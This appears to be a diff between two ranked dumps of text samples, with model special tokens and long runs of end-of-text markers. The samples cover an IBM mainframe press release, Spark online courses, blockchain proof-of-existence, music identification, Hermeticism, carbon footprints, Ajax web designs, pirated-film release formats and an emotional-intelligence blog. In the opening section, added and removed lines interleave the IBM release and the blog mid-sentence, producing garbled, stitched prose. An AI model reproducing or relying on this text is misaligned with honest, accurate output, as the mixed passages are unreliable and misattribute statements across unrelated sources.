IBM research and development primarily in Poughkeepsie, New York as well as 17 other IBM labs around the world and in collaboration with some of IBM's top clients. +You have the shy and introvert engineers, the extrovert developers, the young and goal driven marketers, the creative designers, etc. You also need to deal with the product’s users on a daily basis: Make sure that your clients are satisfied, understand clearly their asks and know how to approach each one. That’s why it is important to use your Emotional Intelligence in order to better assess your team and your end users’ behaviors. -The new IBM mainframe is one of the most secure enterprise systems ever (1), with built-in security features designed to meet the security and compliance requirements of different industries. With operational analytics and near real-time workload monitoring and analysis, clients can use the new zEC12 for a variety of workloads, including hybrid clouds that can take advantage of the System's 25% more performance per core and 50% greater total system capacity than its predecessor as well as the world’s fastest chip running at 5.5 GHz (2). +Imagine this! -Ultimate Security for Critical Information +If you have to release a product within 2 months and you have to choose the person you will be spending most of your time with, who would you choose? How would you describe this person? -IBM System z is a leading platform for secure data serving and the only commercial server to achieve Common Criteria Evaluation Assurance Level 5+ security classification, providing clients the confidence to run many different applications containing confidential data on a single mainframe. The new zEC12 builds on this with innovative security and privacy features to help protect data at rest or in flight -- a critical capability in the age of Internet banking and mobile devices. +If your answer is one or more of the following adjectives : Patient, Empathetic, Thoughtful, Flexible, Hard worker… You may be interested in the soft skills of the person rather than his hard skills and IQ. Indeed, you want to work with a person you like but who also helps you process fast. In product Management, more than any other profession, the soft skills are extremely important. -zEC12 includes a state-of-the-art, tamper-resistant cryptographic co-processor called Crypto Express4S that provides privacy for -================================================================================ -Rank = 19; Score = 5439488.0 -<|begin_of_text|>In the age of ‘Big Data,’ with datasets rapidly growing in size and complexity and cloud computing becoming more pervasive, data science techniques are fast becoming core components of large-scale data processing pipelines. +Imagine also receiving a request from a client for a feature that you would describe as obvious. You may have to explore your empathy since recognizing that not everyone interprets things the same way. -Apache Spark offers analysts and engineers a powerful tool for building these pipelines, and learning to build such pipelines will soon be a lot easier. Databricks is excited to be working with professors from University of California Berkeley and University of California Los Angeles to produce two new upcoming Massive Open Online Courses (MOOCs). Both courses will be freely available on the edX MOOC platform in spring summer 2015. edX Verified Certificates are also available for a fee. +So What’s Emotional Intelligence? -The first course, called Introduction to Big Data with Apache Spark, will teach students about Apache Spark and performing data analysis. Students will learn how to apply data science techniques using parallel programming in Spark to explore big (and small) data. The course will include hands-on programming exercises including Log Mining, Textual Entity Recognition, Collaborative Filtering that teach students how to manipulate data sets using parallel processing with PySpark (part of Apache Spark). The course is also designed to help prepare students for taking the Spark Certified Developer exam. The course is being taught by Anthony Joseph, a professor at UC Berkeley and technical advisor at Databricks, and will start on February 23rd June 1st, 2015. +Emotional Intelligence is the ability to identify and manage your own emotions and the emotions of others. It is generally said to include three skills: emotional awareness; the ability to harness emotions and apply them to tasks like thinking and problem solving; and the ability to manage emotions, which includes regulating your own emotions and cheering up or calming down other people. (Source) -The second course, called Scalable Machine Learning, introduces the underlying statistical and algorithmic principles required to develop scalable machine learning pipelines, and provides hands-on experience using PySpark. It presents an integrated view of data processing by highlighting the various components of these pipelines, including exploratory data analysis, feature extraction, supervised learning, and model evaluation. Students will use Spark to implement scalable algorithms for fundamental statistical models while tackling real-world problems from various domains. The course is being taught by Ameet Talwalkar, an assistant professor at UCLA and technical advisor at Databricks, and will start on April 14th June 29th, 2015. +So, Emotional Intelligence (EQ or EI) in a nutshell is defined as the ability to -Both courses are available for free on the edX website. You can sign up for them today:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Recognize, understand and manage our own emotions + +Recognize, understand and influence the emotions of others + +How to leverage your Emotional intelligence for Product Management? + +Here are 8 Tips that we gathered from Vivek Bed ================================================================================ -Rank = 20; Score = 5406720.0 -<|begin_of_text|>The Bitcoin technologies, namely blockchains are sidechains are used for various other purposes than just for registering and facilitating transactions over the Bitcoin network. Some of the new companies like Astroblocks and Bitproof are building Proof-of-Existence platforms (there is also another platform by the same name) over the Bitcoin blockchain. +Rank = 24; Score = 3063808.0 +<|begin_of_text|>By Ben Lorica -These Proof-of-Existence platforms provides a smart tamper-proof way of storing encrypted information on the Bitcoin blockchain. Each file stored on the blockchain will be associated with a unique irreplicable transaction hash. These transaction hashes will act as a reference to the documents stored on the blockchain. Anything once written on to the blockchain will be stored forever, without any way of deleting it and that is what makes it an ideal electronic system to certify and store documents. +For companies in the early stages of grappling with big data, the analytic lifecycle (model building, deployment, maintenance) can be daunting. In earlier posts I highlighted some new tools that simplify aspects of the analytic lifecycle, including the early phases of model building. But while tools are allowing companies to offload routine analytic tasks to business analysts, experienced modelers are still needed to fine-tune and optimize, mission-critical algorithms. -We can safely say that intellectual property is the most valuable asset any individual or company can have. The process of obtaining protection for your intellectual property is still a cumbersome process. It involves filing the necessary applications, multiple times in few cases and waiting for a long time for the authorities to verify and grant protection. Blockchain based Proof-of-Existence platforms provides an alternate way for both individuals and companies alike to document their creations or discoveries and handle IP disputes more efficiently. +Model Selection: Accuracy and other considerations -Whether it is a new scientific invention, design, artwork, screenplay, story or anything. The creator can record his works on these Proof-of-Existence platforms. In case of any dispute, the inventor can always contest any claims by using the transactional hash of the concerned document. The hash will also act as a timestamp that can be used to identify the time when it was uploaded onto the blockchain. +Accuracy1 is the main objective and a lot of effort goes towards raising it. But in practice tradeoffs have to be made, and other considerations play a role in model selection. Speed (to train/score) is important if the model is to be used in production. Interpretability is critical if a model has to be explained for transparency2 reasons (“black-boxes” are always an option, but are opaque by definition). Simplicity is important for practical reasons: if a model has “too many knobs to tune” and optimizations have to be done manually, it might be too involved to build and maintain it in production3. -Now that anyone can make use of these Proof-of-Existence services, making it easier for them to claim and receive credit for their innovation and creation, no matter how small it is.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Chances are a model that’s fast, easy to explain (interpretable), and easy to tune (simple), is less4 accurate. Experienced model builders are valuable precisely because they’ve weighed these tradeoffs across many domains and settings. Unfortunately not many companies have the experts that can identify, build, deploy, and maintain models at scale. (An example from Google illustrates the kinds of issues that can come up.) + +Fast and/or scalable + +scikit-learn is a popular, well-documented package with models that leverage IPython’s distributed computing features. Over time MLbase will include an optimizer that simplifies model selection for a variety of machine-learning tasks. Depending on their performance requirements, scikit-learn and MLbase users may still need to recode models to speed them up for production. Solutions like VW, H20, and wise.io give users access to fast and scalable implementations of a few algorithms: in the case of wise.io, the company focuses only on Random Forest. Statistics software vendors like Revolution Analytics, SAS, and SPSS have been introducing scalable algorithms and tools for managing the analytic lifecycle. + +The creators of a popular open source, machine-learning project recently launched a startup, focused on building commercial-grade options and tools. GraphLab provides fast toolkits for a range of problems including collaborative filtering, clustering, text mining (topic models), and graph analytics. Having had a chance to play with an early version ================================================================================ -Rank = 21; Score = 5406720.0 +Rank = 25; Score = 3047424.0 <|begin_of_text|>Artificial intelligence (AI) may conjure up images of intelligent systems rising up to enslave us, with sadistic driverless cars taking passengers on terrifying joyrides and malevolent smart fridges refusing to order milk. But in reality, AI is already here; many of us just do not realise it yet. Through the development of machine learning, the technology industry has created smart systems designed to help, not hinder, people. @@ -533,71 +591,33 @@ Big data is a big business, but trawling through hundreds of gigabytes of often Rather than ================================================================================ -Rank = 22; Score = 5177344.0 -<|begin_of_text|>Computer Vision for Music Identification - -by Yan Ke, Derek Hoiem, and Rahul Sukthankar - -Abstract: - -We describe how certain tasks in the audio domain can be effectively addressed using computer vision approaches. This paper focuses on the problem of music identification, where the goal is to reliably identify a song given a few seconds of noisy audio. Our approach treats the spectrogram of each music clip as a 2-D image and transforms music identification into a corrupted sub-image retrieval problem. By employing pairwise boosting on a large set of Viola-Jones features, our system learns compact, discriminative, local descriptors that are amenable to efficient indexing. During the query phase, we retrieve the set of song snippets that locally match the noisy sample and employ geometric verification in conjunction with an EM-based "occlusion" model to identify the song that is most consistent with the observed signal. We have implemented our algorithm in a practical system that can quickly and accurately recognize music from short audio samples in the presence of distortions such as poor recording quality and significant ambient noise. Our experiments demonstrate that this approach significantly outperforms the current state-of-the-art in content-based music identification. - -Y. Ke, D. Hoiem, and R. Sukthankar. In Proceedings of Computer Vision and Pattern Recognition, 2005. [PDF 240KB] - -Demo and Code available here: - -Demonstration video: [CVPR05Video.avi 16MB]. Encoded with Indeo 5.10 and IMA ADPCM. There are both Windows and Linux codecs. - -Windows/Cygwin and Linux binary demo code and sample music: [mrdemo.tgz 15.7MB] - -C++ server code: [musicretr-1.0.tar.gz 87KB] - -Java graphical user interface: [mrgui.tgz 21KB]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 23; Score = 5111808.0 -<|begin_of_text|>A cam is ausually done with a digital video camera. A mini tripod is sometimes used, but a lot of the time this wont be possible, so the camera make shake. Also seating placement isn’t always idle, and it might be filmed from an angle. If cropped properly, this is hard to tell unless there’s text on the screen, but a lot of times these are left with triangular borders on the top and bottom of the screen. Sound is taken from theof the camera, and especially in comedies, laughter can often be heard during the film. Due to these factors picture and sound quality are usually quite poor, but sometimes, and the theater will be fairly empty and a fairly clear signal will be heard.A telesync is the same spec as a CAM except it uses(most likely an audio jack in the chair for hard of hearing people). A direct audio source does not ensure a good quality audio source, as a lot of background noise can interfere. A lot of the times a telesync is filmed in an empty cinema or from the projection booth with a professional camera, giving a better picture quality. Quality ranges drastically, check the sample before downloading the full release.A telecine machine copies the film digitally from the. Sound and picture should be very good, but due to the equipment involved and cost telecines are fairly uncommon. Generally the film will be in correct aspect ratio, althoughtelecines have existed. A great example is thedone a few years ago. TC should not be confused with TimeCode, which is a visible counter on screen throughout the film., sent to rental stores, and various other places for promotional use. A screener is supplied on a VHS tape, and is usually in a 4:3 (full screen) a/r, although letterboxed screeners are sometimes found. The main draw back is a “ticker“ (a message that scrolls past at the bottom of the screen, with the copyright and anti-copy telephone number). Also, if the tape contains any serial numbers, or any other markings that could lead to the source of the tape, these will have to be blocked, usually with a black mark over the section. This is sometimes only for a few seconds, but unfortunately on some copies this will last for the entire film, and some can be quite big. Depending on the equipment used, screener quality can range from excellent if done from a MASTER copy, to very poor if done on an old VHS recorder thru poor capture equipment on a copied -================================================================================ -Rank = 24; Score = 5079040.0 -<|begin_of_text|>Hermeticism is based on the teachings of a mysterious man named Hermes Trismegistus. He is portrayed as a wise teacher, a powerful magician, and a skilled mystic. He has been seen as a teacher of Moses, the inventor of alchemy, and the founder of occult schools throughout history. - -Alexandrian Origins - -Hermes Trismegistus is a composite of several mythological figures. He arose in Ptolemaic Alexandria, where the mishmash of Hellenistic and Egyptian culture bred dozens of interesting cults, religions, and deities. Early on, the Hellenistic deity Hermes became associated with the Egyptian deity Thoth.1 Both were inventors of writing and gods of magic. Both were also psychopomps, responsible for guiding souls in the afterlife. As a result, over the centuries they became identified with each other and were even worshiped together in certain Egyptian temples. In fact, Khmun, the Egyptian center for the cult of Thoth, became known as Hermopolis under the Ptolemies. - -Because of this, Hermes Trismegistus, as a legendary teacher of magic and mysticism, was probably a humanized syncretization of Hermes and Thoth. His legacy has been immense. - -Multiple Hermes? - -Even though Hermes Trismegistus was a mythical figure, many ancient writers wrote about him as if he was a real person. This produced disagreements and confusion. At some point, it began to be assumed that there were two Hermes. In Asclepius, Hermes Trismegistus talks about his grandfather: - -Is it not true that my grandfather Hermes, after whom I am named, resides in his eponymous town whence he aids and cures all those who come to him from every land? +Rank = 26; Score = 2965504.0 +<|begin_of_text|>The Bitcoin technologies, namely blockchains are sidechains are used for various other purposes than just for registering and facilitating transactions over the Bitcoin network. Some of the new companies like Astroblocks and Bitproof are building Proof-of-Existence platforms (there is also another platform by the same name) over the Bitcoin blockchain. -Asclepius 372 +These Proof-of-Existence platforms provides a smart tamper-proof way of storing encrypted information on the Bitcoin blockchain. Each file stored on the blockchain will be associated with a unique irreplicable transaction hash. These transaction hashes will act as a reference to the documents stored on the blockchain. Anything once written on to the blockchain will be stored forever, without any way of deleting it and that is what makes it an ideal electronic system to certify and store documents. -This passage indicates that the Grandfather Hermes is in fact identical with the deity Hermes, residing at Hermopolis.3 Ancient writers invented additional Hermes to fill in the gaps. In fact, it could be that the title “Trismegistus” refers to many great Hermes characters, a line of sages and mystics bringing the Hermetic teachings to humanity over many generations.4 +We can safely say that intellectual property is the most valuable asset any individual or company can have. The process of obtaining protection for your intellectual property is still a cumbersome process. It involves filing the necessary applications, multiple times in few cases and waiting for a long time for the authorities to verify and grant protection. Blockchain based Proof-of-Existence platforms provides an alternate way for both individuals and companies alike to document their creations or discoveries and handle IP disputes more efficiently. -Astrologer, Magus, Alchemist +Whether it is a new scientific invention, design, artwork, screenplay, story or anything. The creator can record his works on these Proof-of-Existence platforms. In case of any dispute, the inventor can always contest any claims by using the transactional hash of the concerned document. The hash will also act as a timestamp that can be used to identify the time when it was uploaded onto the blockchain. -The Hermetica that we read and write about most often are not the only ancient books ascribed to Hermes Trismegistus. Multiple important early works on astrology were also attributed to the legendary sage. The link between Hermes and +Now that anyone can make use of these Proof-of-Existence services, making it easier for them to claim and receive credit for their innovation and creation, no matter how small it is.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 25; Score = 4980736.0 -<|begin_of_text|>Introduction A carbon footprint is the measure of the amount of greenhouse gases (Carbon footprint), measured in units of carbon dioxide, produced by human activities. A carbon footprint can be measured for an individual or an organization, and is typically given in tons of CO 2 -equivalent (CO 2 -eq) per year. For example, the average North American generates about 20 tons of CO 2 -eq each year. The global average carbon footprint is about 4 tons of CO 2 -eq per year (Figure 1). - -Introduction A carbon footprint is the measure of the amount of greenhouse gases (Carbon footprint), measured in units of carbon dioxide, produced by human activities. A carbon footprint can be measured for an individual or an organization, and is typically given in tons of CO 2 -equivalent (CO 2 -eq) per year. For example, the average North American generates about 20 tons of CO 2 -eq each year. The global average carbon footprint is about 4 tons of CO 2 -eq per year (Figure 1). +Rank = 27; Score = 2899968.0 +<|begin_of_text|>ARMONK, NY - 28 Aug 2012: IBM (NYSE: IBM) today announced the zEnterprise® EC12 mainframe server, the most powerful and technologically advanced version of an IBM system that has been the linchpin of enterprise computing for 48 years. The new enterprise system features technologies that demonstrate IBM’s ongoing commitment to meet the growing need to secure and manage critical information with the System z mainframe. -Figure 1. National carbon dioxide (CO2) emissions per capita. (2005). (Source: UNEP/GRID-Arendal Maps and Graphics Library) +Mainframes support significant portions of the data environment at most large enterprises. As these enterprises grapple with the well-documented growth of data, they are looking for new ways to secure and gain insights from such critical information as financial, customer and enterprise resource data that will enable them to provide their clients with new services. The new zEC12 offers industry-leading security and robust support for operational analytics that can help clients efficiently sift through large volumes of raw data and transform it to gain knowledge that can be used for competitive advantage. For example, a retailer managing online transactions on zEC12 can gain insights from client information that will enable it to provide clients with a more customized shopping experience. -An individual’s or organization’s carbon footprint can be broken down into the primary and secondary footprints. The primary footprint is the sum of direct emissions of greenhouse gases from the burning of fossil fuels for energy consumption and transportation. More fuel-efficient cars have a smaller primary footprint, as do energy-efficient light bulbs in your home or office. Worldwide, 82% of anthropogenic greenhouse gas emissions are in the form of CO 2 from fossil fuel combustion (Figure 2). +The IBM zEC12 enterprise system is the result of an investment by IBM Systems and Technology Group of more than $1 billion in IBM research and development primarily in Poughkeepsie, New York as well as 17 other IBM labs around the world and in collaboration with some of IBM's top clients. -The secondary footprint is the sum of indirect emissions of greenhouse gases during the lifecycle of products used by an individual or organization. For example, the greenhouse gases emitted during the production of plastic for water bottles, as well as the energy used to transport the water, contributes to the secondary carbon footprint. Products with more packaging will generally have a larger secondary footprint than products with a minimal amount of packaging. +The new IBM mainframe is one of the most secure enterprise systems ever (1), with built-in security features designed to meet the security and compliance requirements of different industries. With operational analytics and near real-time workload monitoring and analysis, clients can use the new zEC12 for a variety of workloads, including hybrid clouds that can take advantage of the System's 25% more performance per core and 50% greater total system capacity than its predecessor as well as the world’s fastest chip running at 5.5 GHz (2). -Greenhouse gases and the greenhouse effect +Ultimate Security for Critical Information -Figure 2. Anthropogenic greenhouse gas emissions. (Source: Energy Information Administration) +IBM System z is a leading platform for secure data serving and the only commercial server to achieve Common Criteria Evaluation Assurance Level 5+ security classification, providing clients the confidence to run many different applications containing confidential data on a single mainframe. The new zEC12 builds on this with innovative security and privacy features to help protect data at rest or in flight -- a critical capability in the age of Internet banking and mobile devices. -Although carbon footprints are reported in annual tons of CO 2 emissions, they actually are a measure of total greenhouse gas emissions. A greenhouse gas is any gas that traps heat in the atmosphere through the greenhouse effect. Because of the presence of greenhouse gases in our atmosphere the average temperature of the Earth +zEC12 includes a state-of-the-art, tamper-resistant cryptographic co-processor called Crypto Express4S that provides privacy for ================================================================================ -Rank = 26; Score = 4980736.0 +Rank = 28; Score = 2883584.0 <|begin_of_text|>Ajax a short form of Asynchronous JavaScript and XML is a set of techniques used by many modern and popular web sites. This technique allows portions of a Web page to be updated without refreshing the entire page, a significant advance in the development of websites and web-based applications. For example, a site might allow you to rate a product or item by clicking on a star image. With Ajax, your vote could be registered without having to load the entire page again. In this post, we are listing down 15 Beautiful Web Designs Empowered With Ajax Techniques for your inspiration. If you like this post so please spread the word as much as possible via twitter. You are welcome if you want to share more web designs empowered with Ajax techniques that we have missed here and you think our readers/viewers may like. Do you want to be the first one to know the latest happenings at SmashingApps.com just subscribe to our rss feed and you can follow us on twitter as well. @@ -634,59 +654,7 @@ Inbox Shelfari<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 27; Score = 4915200.0 -<|begin_of_text|>How to use your Emotional Intelligence to Better PM - -Veamly Blocked Unblock Follow Following Jun 26, 2017 - -(Originally posted on Veamly) - -Note : This blog is based on Vivek Bedi’s talk, The VP of Product at LearnVest on Product School - -As a Product Manager, you don’t only need to oversee the production process, but you also have to lead and motivate your team. After all, they are the people behind the success or the failure of the product. But the thing is that, they all have different personalities and come from very different backgrounds. - -You have the shy and introvert engineers, the extrovert developers, the young and goal driven marketers, the creative designers, etc. You also need to deal with the product’s users on a daily basis: Make sure that your clients are satisfied, understand clearly their asks and know how to approach each one. That’s why it is important to use your Emotional Intelligence in order to better assess your team and your end users’ behaviors. - -Imagine this! - -If you have to release a product within 2 months and you have to choose the person you will be spending most of your time with, who would you choose? How would you describe this person? - -If your answer is one or more of the following adjectives : Patient, Empathetic, Thoughtful, Flexible, Hard worker… You may be interested in the soft skills of the person rather than his hard skills and IQ. Indeed, you want to work 